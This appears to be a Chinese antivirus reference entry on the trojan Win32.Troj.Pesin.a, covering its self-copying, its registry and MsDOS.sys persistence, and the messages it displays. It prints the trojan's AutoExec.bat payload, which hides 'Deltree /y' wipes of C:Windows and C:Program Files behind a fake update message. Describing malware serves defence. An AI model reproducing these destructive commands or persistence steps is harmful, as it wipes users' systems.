Win32.Troj.Pesin.a

發作條件:

每年6月4日，病毒刪除硬碟的系統目錄 及默認程式目錄

系統修改:

A、將自身複製到系統安裝目錄下生成如下檔案：

%System%SysTask.exe

將自身複製到c:My Documents目錄下生成

My Heart.exe

B、

1、在註冊表主鍵：

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun

下添加如下鍵值：

"WLoadService" = "%System%SysTask.exe /run"

C、在MsDOS.sys 中加入以下字元

[Options]

BootWarn=1

BootKeys=0

發作現象:

A、用戶運行病毒後，程式會生成一個~temp.doc，並自動調用寫字板，如果是Win98系統，寫字板會顯示如下信息：

Dear My Love,

Sebiru tatapanmu, Sebiru hatimu, Sebiru Kasihmu. Biru merupakan Damainya sebuah Cinta. Kutahu semuanya !! namun semua bukan lah untukku karna aku tak pantas untukmu. Hanya Keperihan serta Kerinduan tak bertepi yang pantas Kudapat darimu

-----BlueLove

B、用戶會檢查今天是不是6月4日，如果是，則在用戶關機時，則在AutoExec.bat中加入

@echo off

Echo Pesan ini kutujukan kepada mereka yang tak percaya akan

Echo Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi

Echo apakah orang bodoh tak punya Impian ... ?? Hanya dengan

Echo dalih ketidak percayaan, kalian telah hancurkan impian Putih ku

Echo Tak apa ... !! karna kini impian itu tlah berubah menjadi

Echo Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian

Echo telah tuduhkan kepadaku ... !! Hari ini adalah Hari Ulang Tahun Ku

Echo yang ke - 21Aku punya kado manis untuk mu !! semoga dengan kado ini kamu

Echo dapat nikmati .... !!

Echo Kepada Bapak Samsu dan Ibu Heni "Terima Kasih Kalian tlah tanamkan impian hitam dihati ini"

Echo Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,

Echo Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3

Echo I LOVE U ALL

Echo Bye Bye

pause

Echo Windows is updating file(s) Please wait....

Deltree /y C:Windows

Deltree /y C:Program Files

並彈出一個標題為ByeBye的對話框，顯示如下內容：

Selamat ulang tahun ke-21 My Love!

Aku punya hadiah spesial untukmu...

C、用戶在下一次開機時，執行批處理，刪除C:Windows和C:Program Files下所有的檔案。

特別說明: